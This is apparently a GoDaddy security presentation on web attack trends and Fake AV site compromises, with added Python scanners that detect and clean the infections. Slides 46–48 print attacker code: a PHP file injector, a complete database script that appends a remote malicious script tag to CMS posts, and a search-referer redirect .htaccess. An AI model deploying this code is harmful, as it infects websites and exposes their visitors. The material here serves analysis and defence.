
Keeping up with the web application security


1 Keeping up with the web application security
Ganesh Devarajan & Todd Redfoot

2 Introduction
Todd Redfoot, Chief Information Security Officer
Ganesh Devarajan, Sr. Security Architect. With GoDaddy for the past 7 years.

3 The Background (What does Go Daddy do?)

4

5 What does Go Daddy do?
9.4 Million Customers
48 Million Domains Under Management
Over 5 million Active Hosting Accounts
1/3 of all DNS queries run through our servers
We register, renew or transfer more than one domain name every second

6 What does Go Daddy do?
40+ Security Professionals in Team
24 x 7 Operations Center
Research
Engineering
Forensics
Customer Security Advisors
Penetration Testing
User Administration
Development

7

8 The Numbers (What does Go Daddy see?)

9 What do we see?
Monitor over 100,000 events per second (8.6 Billion/Day)
DDoS - ~900 Attacks per day / 6K per week
Feb Largest 21M pps
Last Week – 40G Attack
Brute Force – 3.5M per hour
Defense in Depth – IPS/IDS/HIPS/DDoS Mitigation/AV/Custom tools
Over 15 Vendors
Add more stats

10 What do we see?
“Other” Attacks:
425K – Invalid Directory Traversal
90K – XSS Prevention
115K – SQL Injection Prevention
… all in a 24 hour period…

11 Current Trends

12 SSH Brute Forcers – Top 10 Countries Overall
US 3,747,586,867
CN 1,391,063,846
KR 410,861, (South Korea)
BG AR TW FR JP CA BR

13 SSH Brute Forcers
Top 100 locations: 140 Million hits
Englewood, Colorado: 140 Million attempts

14 MS-SQL Brute Forcers
US 14,511,737,464
CN 5,276,229,089
TR 1,195,238,504 (Turkey)
CA KR TH RU VN
IE 58,579,068

15 MS-SQL Brute Forcers
Orlando, FL: 348 Million attempts

16 My-SQL Brute Forcers
US 410,930,467
CN 62,659,135
CA 19,172,097
SE FR MY PH IN JP KR

17 My-SQL Brute Forcers

18 FTP Brute Forcers
CN 1,841,082,597
US 724,550,747
HK 47,819,115
CA IE TW KR RS DE BR

19 FTP Brute Forcers
XingPing, CN: 12 Million attempts

20 Brute Forcers - All
US 19,395,137,402
CN 8,572,775,125
TR 1,239,567,167
KR CA BG TH AR TW

21 Brute Forcers - US
Garden City, NY: 75.7 Million attempts

22 Brute Forcers - CN
Datong, CN: 22.5 Million attempts

23 Brute Forcinator

24 SQL Injection
US 38,982,921
CN 26,439,940
BG 8,421,757 (Bulgaria)
UK ID NL CZ JP AU FR

25 SQL Injection
Seattle, WA: 1.3 Million attempts

26 Backdoor Shells
US 82,794,055
ID 4,100,733 (Indonesia)
NG 2,059,283 (Nigeria)
UK CN CA DE BR NL AL

27 Backdoor Shells
Phone Company (91%), Mountain View, CA
Ribbit Corporation – 91/100 came out of this network

28 PHP Attacks
US 365,310,722
KR 46,248,057 (Korea)
FR 33,197,366 (France)
RU DE LU UK BR CA NL

29 PHP Attacks
US 355,060,856
Berlin, Germany: 1.9 Million attempts

30 PHP Attacks
US 355,060,856
Montreal, CA: 1.1 Million attempts

31 Botnet C&C and bots
Does not include Shadow server feeds.
US 150,662,088
UK 19,701,763 (United Kingdom)
KR 18,372,678
PL FR DE CA RU NL AU

32 Botnet
Not sure why China isn't up there…
This does not include the Shadow server/Emerging Threat feeds…

33 Botnet
Source - https://zeustracker.abuse.ch/

34 Botnet

35 Phishing

36 The Good, Bad and Ugly?

37 The Bad – Most Events
Russian federation Proxy, Moscow city
Based on all these events – where are the bad ISP’s???
3 CN ASN’s not included
This includes the overall hits.
This is the Bad List

38 The Ugly – Security Events & DDoS
ISP = Chinanet, China169 and CERNET
ASN = Heavy rate limiting of these ASNs to better protect our environment.

39 New Trends

40 Recent Changes
“Hacktivists”: Lulzsec = Twitter, ComodoHacker = Pastebin
Phishing -> Spear Phishing
Targeted & Coordinated Attacks: RSA / Lockheed Martin Connection

41 What’s in the News?
Executables spoofed as Images: 2,226 hits in the last few days. Cameron Diaz = #2
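The check behind "executables spoofed as images" is a comparison of what the file name claims against what the leading bytes say. The following is an added example, not code from the presentation: it sniffs image and native-executable magic bytes, goes one step further for Windows binaries by following the DOS stub's e_lfanew offset to the "PE\0\0" signature (a file that merely begins with the letters "MZ" is not flagged), and classifies a set of constructed sample uploads. The sample file names and contents are made up for the example.

```python
import struct

# Leading bytes of common image formats.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"BM": "bmp",
}
# Leading bytes of native executables; "MZ" alone is weak, so PE gets a deeper check in is_pe().
EXECUTABLE_MAGIC = {
    b"\x7fELF": "elf",
    b"\xca\xfe\xba\xbe": "macho-fat",
    b"\xfe\xed\xfa\xce": "macho-32",
    b"\xfe\xed\xfa\xcf": "macho-64",
}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp"}
EXECUTABLE_KINDS = {"pe"} | set(EXECUTABLE_MAGIC.values())


def is_pe(data: bytes) -> bool:
    """True if data has a DOS stub whose e_lfanew field (offset 0x3c) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def sniff(data: bytes) -> str:
    """Content type implied by the bytes alone, ignoring the file name."""
    if is_pe(data):
        return "pe"
    for magic, kind in EXECUTABLE_MAGIC.items():
        if data.startswith(magic):
            return kind
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def classify(filename: str, data: bytes) -> str:
    """Compare the claimed extension with the sniffed type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    if ext not in IMAGE_EXTENSIONS:
        return "not-an-image-name"
    if kind in EXECUTABLE_KINDS:
        return "spoofed-executable"
    if kind == "unknown":
        return "unrecognised-image"
    return "image"


def fake_pe() -> bytes:
    """Constructed minimal PE-shaped blob: MZ stub, e_lfanew = 0x40, then the PE signature."""
    stub = bytearray(0x40)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)
    return bytes(stub) + b"PE\0\0" + b"\0" * 20


# Constructed sample uploads; names and contents are illustrative, not from the slide.
SAMPLES = {
    "celebrity_photo.jpg": fake_pe(),
    "vacation.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\0" * 8,
    "chart.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 8,
    "odd.gif": b"MZ this only starts with the letters MZ",
}


def scan(samples: dict) -> dict:
    """Verdict per file name."""
    return {name: classify(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:24} {verdict}")
```

At an upload gateway the same check runs on the first 64 bytes of the stream before the file is written; the "unrecognised-image" verdict is the one to quarantine rather than reject outright, since it also catches less common but legitimate formats.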

42 More of the same…
More Client-side Exploits: Browser exploits, Adobe exploits
Web Server Compromises: Brute Force Attacks, Leveraging Web Application Vulnerabilities, Config files with passwords
Find average days between 0 day and exploit?

43 Fake AV
Scareware: reports fake viruses to users
Asks for fee to remove the threat
Paying does nothing but give them your CC#
$10 Million in Revenue last year
Specific types of attack – Fake AV
Some reports have ~$10MM in revenue last year

44 Fake AV Analysis

45 Fake AV – Attack Breakdown
Registrant: Hilary Kneber
fax: 29/2 Sun street. Montey 29 Virginia NA 3947

46 Fake AV – Sample Shell
    $z=$_SERVER["DOCUMENT_ROOT"];
    // The prefix written into victim files: a PHP open tag, an empty comment and a
    // base64 payload. The slide elides the encoded string.
    $encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';
    // The shell deletes itself from disk as soon as it runs.
    @unlink($_SERVER['SCRIPT_FILENAME']);
    $val=$z;
    $totalinjected=0;
    echo "Working with $val\n!!STARTING!!";
    ob_flush();
    $start_time=microtime(true);
    // do_folder() is not shown on the slide: it walks the document root, writes
    // $encoded into the files it finds and counts them in $totalinjected.
    if ($val!="") do_folder($val);
    $end_time=microtime(true)-$start_time;
    echo "|Injected| $totalinjected files in $end_time seconds\n";
Last line reports back to the attacker the statistics of how many files were infected.
Random file names.
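A scanner for the file-side infection described on this slide, as an added example rather than anything from the presentation. It walks a document root, matches the injected prefix by shape (PHP open tag, empty comment, a long base64 run, then the `"));?>` tail shown on the slide) and decodes the base64 so the analyst can see what the payload starts with. The slide elides the code between the comment and the string, so the pattern allows up to 64 bytes there without assuming what it is; the sample tree it builds, including the `eval(base64_decode(` call used to fill that gap and the random-looking file name, is constructed for the example.

```python
import base64
import os
import re
import tempfile

# Shape of the injected prefix: "<?php /**/", up to 64 bytes of elided code, a base64 run of at
# least 40 characters with optional padding, then the '"));?>' tail seen on the slide.
INJECT_RE = re.compile(
    rb'<\?php\s*/\*\*/[^\n]{0,64}?([A-Za-z0-9+/]{40,}={0,2})"\)\);\s*\?>'
)


def build_sample_tree(root: str) -> None:
    """Write a constructed document root containing clean and injected files."""
    clean = b"<?php\necho 'hello';\n"
    marker = b"/* constructed payload marker */"
    # Assumption for the sample only: the elided code is a decode-and-run call.
    injected = b'<?php /**/ eval(base64_decode("' + base64.b64encode(marker) + b'"));?>'
    files = {
        "index.php": clean,
        "wp-includes/functions.php": injected + clean,  # prefix prepended to a real file
        "images/logo.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 8,
        "cache/a8f3k2.php": injected,                    # random-looking name, as the slide notes
    }
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def scan_file(path: str):
    """Decoded start of the payload if the file carries the injected prefix, else None."""
    with open(path, "rb") as fh:
        data = fh.read()
    m = INJECT_RE.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True)[:48]
    except ValueError:
        return b""  # right shape, but the string was not valid base64


def scan_tree(root: str) -> dict:
    """Map relative path -> payload preview for every injected file under root."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            preview = scan_file(path)
            if preview is not None:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits[rel] = preview
    return hits


def demo() -> dict:
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, preview in sorted(demo().items()):
        print(f"{rel}: {preview!r}")
```

Because the injector prepends rather than replaces, a legitimate file keeps working after infection, which is why the scan keys on the prefix rather than on file size or modification time; the self-deleting shell and the randomly named drop files mean the injected prefix is often the only artifact left on disk.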

47 Fake AV – DB Variant
    <?php
    // Credentials are POSTed to the shell; it never stores them.
    $host=$_POST["ip"];
    $user=$_POST["user"];
    $pass=$_POST["pass"];
    // The tag appended to every piece of CMS content it can find.
    $insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';

    // True when $in ends with $se; used to pick tables by name suffix.
    function last_is($in,$se){
        $l=strlen($se);
        $m=strlen($in);
        $k=substr($in,$m-$l);
        if ($k==$se) return 1;
        return 0;
    }

    $link=mysql_connect($host,$user,$pass);
    if (!$link) {
        die('Could not connect: ' . mysql_error());
    } else {
        echo 'Connected successfully'."\n";
        // Enumerate every database the credentials can see.
        $db_list = mysql_list_dbs($link);
        $bases = array();
        while ($row = mysql_fetch_object($db_list)) {
            $bases[]=$row->Database;
        }
        $bases_c=count($bases);
        for($i=0;$i<$bases_c;$i++){
            echo "Working with $bases[$i]\n";
            $result = mysql_list_tables($bases[$i]);
            if (!$result) {
                print "DB Error, could not list tables\n";
                print 'MySQL Error: ' . mysql_error();
                continue;
            }
            while ($row = mysql_fetch_row($result)) {
                $table=$row[0];
                echo "checking $table,";
                $query="";
                //wordpress
                if (last_is($table,"_posts")){
                    $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')";
                }
                //joomla
                if (last_is($table,"_content")){
                    $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')";
                }
                //drupal
                if (last_is($table,"node_revisions")){
                    $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2";
                }
                if (last_is($table,"_post")){
                    $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')";
                }
                if ($query!=""){
                    echo "Query: $query\n";
                    // Errors are suppressed; a wrong guess about a column just moves on.
                    @mysql_query($query);
                }
            }
            mysql_free_result($result);
        }
        echo "DONE\n";
        mysql_close($link);
    }
    ?>
The script never touches the web root: it appends the remote script tag to WordPress posts, Joomla articles and Drupal node revisions directly in the database, so a file-integrity check of the site finds nothing.
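Because this variant modifies content rows rather than files, detection and cleanup also have to happen in the database. The following added example (not from the presentation) reproduces the shell's table-selection rule, builds a small SQLite database with constructed WordPress, Joomla and Drupal tables, applies the same append-style infection to two of them, then finds the injected rows and strips the tag only where it is the exact trailing suffix that `concat()` would have produced. SQLite uses `||` where MySQL uses `concat()`; the table and row contents are made up for the example.

```python
import sqlite3

# The tag the DB variant appends (from the $insert line on the slide).
INJECTED = '<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>'

# Table-name suffix -> column the shell updates, taken from its last_is() checks.
TARGET_COLUMNS = [
    ("_posts", "post_content"),    # WordPress
    ("_content", "introtext"),     # Joomla
    ("node_revisions", "body"),    # Drupal
    ("_post", "title"),
]


def target_column(table: str):
    """Column the shell would hit for this table name, or None.
    Later rules win, mirroring the shell's chain of independent ifs."""
    col = None
    for suffix, column in TARGET_COLUMNS:
        if table.endswith(suffix):
            col = column
    return col


def build_sample_db() -> sqlite3.Connection:
    """Constructed CMS tables, two of them infected the way the shell does it."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT);
        CREATE TABLE jos_content (id INTEGER PRIMARY KEY, introtext TEXT);
        CREATE TABLE node_revisions (vid INTEGER PRIMARY KEY, body TEXT, format INTEGER);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_value TEXT);
        INSERT INTO wp_posts VALUES (1, '<p>Hello world</p>'), (2, '<p>Second post</p>');
        INSERT INTO jos_content VALUES (1, '<p>Joomla intro</p>');
        INSERT INTO node_revisions VALUES (1, 'Drupal body', 1);
        INSERT INTO wp_options VALUES (1, 'siteurl');
    """)
    # Same effect as the shell's concat() UPDATEs, limited to two tables for the example.
    con.execute("UPDATE wp_posts SET post_content = post_content || ? WHERE ID = 1", (INJECTED,))
    con.execute("UPDATE jos_content SET introtext = introtext || ?", (INJECTED,))
    con.commit()
    return con


def user_tables(con: sqlite3.Connection) -> list:
    """Table names from the catalog (trusted source, so they can be quoted into SQL)."""
    return [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")]


def find_injected(con: sqlite3.Connection, needle: str = "js.php?kk=") -> dict:
    """{(table, column): rows} for target columns that contain the loader marker."""
    hits = {}
    for table in user_tables(con):
        col = target_column(table)
        if col is None:
            continue
        n = con.execute(f'SELECT count(*) FROM "{table}" WHERE "{col}" LIKE ?',
                        ("%" + needle + "%",)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits


def strip_trailing_tag(con: sqlite3.Connection, tag: str = INJECTED) -> int:
    """Remove the tag only where it is the exact suffix concat() left; returns rows fixed."""
    removed = 0
    for table in user_tables(con):
        col = target_column(table)
        if col is None:
            continue
        cur = con.execute(
            f'UPDATE "{table}" SET "{col}" = substr("{col}", 1, length("{col}") - ?) '
            f'WHERE substr("{col}", ?) = ?',
            (len(tag), -len(tag), tag))
        removed += cur.rowcount
    con.commit()
    return removed


if __name__ == "__main__":
    con = build_sample_db()
    print("before:", find_injected(con))
    print("rows cleaned:", strip_trailing_tag(con))
    print("after:", find_injected(con))
```

Suffix-anchored removal is deliberate: a `REPLACE()` over the whole column would also alter legitimate content that happens to quote the tag, and it would not reveal rows that were hit more than once (each pass appends another copy, so the cleanup can simply be re-run until `find_injected` is empty).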

48 Fake AV - Search Redirect
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* [R,L]
    </IfModule>
    addhandler x-httpd-php-cgi .php4
    addhandler x-httpd-php5-cgi .php5
    addhandler x-httpd-php5-cgi .php
Only visitors who arrive from a search engine (matched on the Referer header) are redirected; the redirect target of the RewriteRule is not shown on the slide. The site owner, who types the URL directly, never sees the redirect.
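A small .htaccess audit for this technique, added here as an example and not part of the presentation. It groups each `RewriteRule` with the `RewriteCond` lines that precede it (in Apache a condition applies only to the next rule), then flags rules that carry the `R` flag and whose conditions test `%{HTTP_REFERER}` against search-engine names, either with an external target or with no target at all, as on the slide. The sample .htaccess is constructed: it reuses the slide's conditions, adds an assumed redirect target on `example.invalid`, and includes an ordinary WordPress front-controller rule that must not be flagged.

```python
import re

SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista.com", "excite.com", "search.yahoo")
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)(?:\s+(\S+))?(?:\s+\[([^\]]*)\])?", re.I)


def parse_rules(text: str) -> list:
    """Group each RewriteRule with the RewriteCond lines before it."""
    rules, pending = [], []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending.append((m.group(1), m.group(2), m.group(3) or ""))
            continue
        m = RULE_RE.match(line)
        if m:
            pattern, target, flags = m.group(1), m.group(2), m.group(3) or ""
            # "RewriteRule .* [R,L]" (no target, as on the slide): the flag list lands in the target slot.
            if target and target.startswith("[") and target.endswith("]") and not flags:
                flags, target = target[1:-1], None
            rules.append({"conds": pending, "pattern": pattern, "target": target, "flags": flags})
            pending = []
    return rules


def is_redirect(flags: str) -> bool:
    """R or R=3xx in the flag list means an external redirect, not an internal rewrite."""
    return any(f.strip().upper().split("=")[0] == "R" for f in flags.split(",") if f.strip())


def find_search_redirects(text: str) -> list:
    """Rules that redirect only visitors whose Referer is a search engine."""
    findings = []
    for rule in parse_rules(text):
        engines = sorted({e for var, pat, _ in rule["conds"]
                          if "HTTP_REFERER" in var.upper()
                          for e in SEARCH_ENGINES if e in pat.lower()})
        if not engines or not is_redirect(rule["flags"]):
            continue
        target = rule["target"]
        if target is None or re.match(r"https?://", target, re.I):
            findings.append({"pattern": rule["pattern"], "target": target, "engines": engines})
    return findings


# Constructed sample: the slide's conditions, an assumed external target, then a normal WordPress rule.
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://example.invalid/go.php [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
"""

if __name__ == "__main__":
    for f in find_search_redirects(SAMPLE_HTACCESS):
        print(f"pattern={f['pattern']} target={f['target']} referers={','.join(f['engines'])}")
```

Run against every .htaccess under a hosting account's web roots; the same grouping logic applies to `RewriteCond` on `%{HTTP_USER_AGENT}` when the redirect is keyed on crawler strings instead of referers.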

49 Custom Monitoring
He turns red
Audible Alarm
Txt messaging

50 UDP Flooder
2.8 million events in 24 hr

51 How to Protect?

52 Website Vulnerability Scanners
Website Protection - Site Scanner ($48/Year)
Beyond Security ($99.95/Year)
McAfee Secure™ (~$2100/Year)
WhiteHat Security®
IBM AppScan®
Cenzic®
HP WebInspect®

53 Web Based Malware Detection
Virtual machine Honey pots: monitor creation of new processes, file system or registry entries, etc.
Browser Emulation
Reputation Service: Internet’s black list
Signature Based Detection/Prevention: Intrusion Detection System/Intrusion Prevention System, Anti-Virus
Honey Monkey, Honeyd

54 New Methodologies Regular updates of the Reputation Service Feed (to avoid deep inspection) Blocks malicious requests going to the Servers Blocks the Malicious Response coming from the Servers Blocks C&C Commands Blocks the DDoS Flood going to the Servers Based on the traffic patterns the Website scanning engine regularly checks the sites Content Sanitizer can remove the Malicious link and send the clean response.

55 Questions?

56 Thank You
Ganesh Devarajan, Todd Redfoot
gdevarajan@godaddy.com

